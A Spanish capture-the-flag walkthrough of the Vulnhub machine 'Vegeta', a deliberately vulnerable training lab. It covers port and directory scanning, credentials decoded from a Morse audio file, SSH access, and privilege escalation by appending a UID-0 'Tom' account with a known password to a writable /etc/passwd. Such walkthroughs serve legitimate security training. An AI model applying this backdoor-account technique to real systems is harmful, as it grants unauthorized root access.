[VLN] Vegeta

Hoy vamos a hackear la maquina de Vulnhub llamada Vegeta.Podeis descargarla desde el siguiente enlace: Vegeta

Video


Enumeration


Empezamos con un nmap para ver que puertos tiene abiertos.

sml@Cassandra:~$ nmap -A -p- 192.168.1.100
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-29 13:26 CEST
Nmap scan report for Vegeta.home (192.168.1.100)
Host is up (0.00043s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 1f:31:30:67:3f:08:30:2e:6d:ae:e3:20:9e:bd:6b:ba (RSA)
|   256 7d:88:55:a8:6f:56:c8:05:a4:73:82:dc:d8:db:47:59 (ECDSA)
|_  256 cc:de:de:4e:84:a8:91:f5:1a:d6:d2:a6:2e:9e:1c:e0 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.24 seconds

sml@Cassandra:/usr/share/seclists/Discovery/Web-Content$ gobuster dir -u 
http://192.168.1.100 -w  directory-list-2.3-big.txt -x php,html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.100
[+] Threads:        10
[+] Wordlist:       directory-list-2.3-big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,html
[+] Timeout:        10s
===============================================================
2020/06/29 13:29:26 Starting gobuster
===============================================================
/index.html (Status: 200)
/img (Status: 301)
/login.php (Status: 200)
/image (Status: 301)
/admin (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
/bulma (Status: 301)
/logitech-quickcam_W0QQcatrefZC5QQfbdZ1QQfclZ3QQfposZ95112QQfromZR14QQfrppZ50QQf
sclZ1QQfsooZ1QQfsopZ1QQfssZ0QQfstypeZ1QQftrtZ1QQftrvZ1QQftsZ2QQnojsprZyQQpfidZ0Q
QsaatcZ1QQsacatZQ2d1QQsacqyopZgeQQsacurZ0QQsadisZ200QQsaslopZ1QQsofocusZbsQQsore
finesearchZ1.html (Status: 403)
===============================================================
2020/06/29 13:47:52 Finished
===============================================================
Vemos un directorio interesante: /bulma Al visitarlo podemos encontrar un fichero .wav, el cual nos descargamos. Una vez descargado, visitamos la siguiente pagina: https://morsecode.world/international/decoder/audio-decoder-adaptive.html Hacemos el upload del audio, y finalmente nos muestra: USER : TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL) Parece que son las credenciales :) Vamos a probar!

Low Shell



sml@Cassandra:~$ ssh trunks@192.168.1.100
trunks@192.168.1.100's password: 
Linux Vegeta 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Jun 28 21:16:00 2020 from 192.168.43.72
trunks@Vegeta:~$
Ahora que estamos dentro del sistema, investigamos un poco mas...

trunks@Vegeta:~$ cat .bash_history
perl -le 'print crypt("Password@973","addedsalt")'
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd[/sh]
echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
ls
su Tom
ls -la
cat .bash_history 
sudo apt-get install vim
apt-get install vim
su root
cat .bash_history 
exit
Vemos que en el "history" tiene comandos donde intenta modificar el fichero /etc/passwd para agregar al usuario Tom, con UID Y GID 0 (como root). Echamos un vistazo a los permisos de /etc/passwd.

trunks@Vegeta:~$ ls -l /etc/passwd
-rw-r--r-- 1 trunks root 1486 Jun 28 21:23 /etc/passwd
Vemos que el usuario trunks tiene permisos para escribir. Sabiendo esto, ejecutamos el comando que aparece en el history para crear al usuario Tom, y luego nos logueamos como Tom para tener la cuenta de root!

Privilege Escalation


Ejecutamos el siguiente comando para agregar Tom al sistema...

trunks@Vegeta:~$ echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> 
/etc/passwd
Nos logueamos como Tom.. (pass Password@973).

trunks@Vegeta:~$ su Tom
Password: 
root@Vegeta:/home/trunks#

root.txt



root@Vegeta:/home/trunks# cd /root
root@Vegeta:~# ls
root.txt
root@Vegeta:~# cat root.txt

                               ,   ,'|
                             ,/|.-'   \.
                          .-'  '       |.
                    ,  .-'              |
                   /|,'                 |'
                  / '                    |  ,
                 /                       ,'/
              .  |          _              /
               \`' .-.    ,' `.           |
                \ /   \ /      \          /
                 \|    V        |        |  ,
                  (           ) /.--.   ''"/
                  "b.`. ,' _.ee'' 6)|   ,-'
                    \"= --""  )   ' /.-'
                     \ / `---"   ."|'
  V E G I I T A       \"..-    .'  |.
                       `-__..-','   |
                     _.) ' .-'/    /\.
               .--'/----..--------. _.-""-.
            .-')   \.   /     _..-'     _.-'--.
           / -'/      """""""""         ,'-.   . `.
          | ' /                        /    `   `. \
          |   |                        |         | |
           \ .'\                       |     \     |
          / '  | ,'               . -  \`.    |  / /
         / /   | |                      `/"--. -' /\
        | |     \ \                     /     \     |
 	 | \      | \                  .-|      |    |


Hurray you got root

Share your screenshot in telegram : https://t.me/joinchat/MnPu-h3Jg4CrUSCXJpegNw

End


Y con esto ya seriamos root de la maquina :)